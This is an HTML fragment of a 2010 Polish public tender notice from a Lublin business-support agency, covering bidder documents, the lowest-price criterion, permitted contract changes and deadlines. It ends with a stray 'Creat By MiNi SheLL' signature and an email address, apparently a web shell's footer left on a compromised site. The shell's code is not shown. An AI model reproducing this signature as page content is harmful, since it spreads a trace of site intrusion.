<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
a) zmiany spowodowane skutkami klęsk żywiołowych oraz następstw nieszczęśliwych wypadków;
b) konieczność realizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa;
c) zmiana obowiązującej stawki VAT;
d) zmiany uzasadnione okolicznościami, o których mowa w art. 357 § 1 Kodeksu cywilnego (tzw. rażąca strata). 
Dodatkowo Zamawiający zastrzega sobie prawo do zmiany umowy, gdy zmiany te są korzystne dla Zamawiającego lub wynikają z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, w szczególności mogą ulec zmianie:
a ) 	technologia wykonania oznaczeń promocyjnych na zamawianych materiałach, w sytuacji gdy ilość wskazanych informacji nie pozwala na wykonanie czytelnego nadruku preferowaną przez Zamawiającego metodą,
b)	technologia wykonania oznaczeń promocyjnych na zamawianych materiałach, w sytuacji, gdy tworzywo z którego produkowane są materiały nie utrzymuje trwałości wykonanego nadruku.
c)	ilość elementów nadruku, w sytuacji, gdy ilość miejsca wyznaczonego na nadruk na produkcie nie pozwala na wykonanie pełnego oznaczenia wskazanego w opisie przedmiotu zamówienia.
d)	adres siedziby Zamawiającego i Wykonawcy, 
e)	osoby upoważnione ze strony Zamawiającego i Wykonawcy do kontaktów z Wykonawcą i z Zamawiającym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lawp.lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Lubelska Agencja Wspierania Przedsiębiorczości w Lublinie ul. Graniczna 4, 20-010 Lublin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2010 godzina 08:00, miejsce: Lubelska Agencja Wspierania Przedsiębiorczości w Lublinie
ul. Graniczna 4, 20-010 Lublin
I piętro, pokój 19 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa będąca przedmiotem niniejszego postępowania jest współfinansowana ze przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com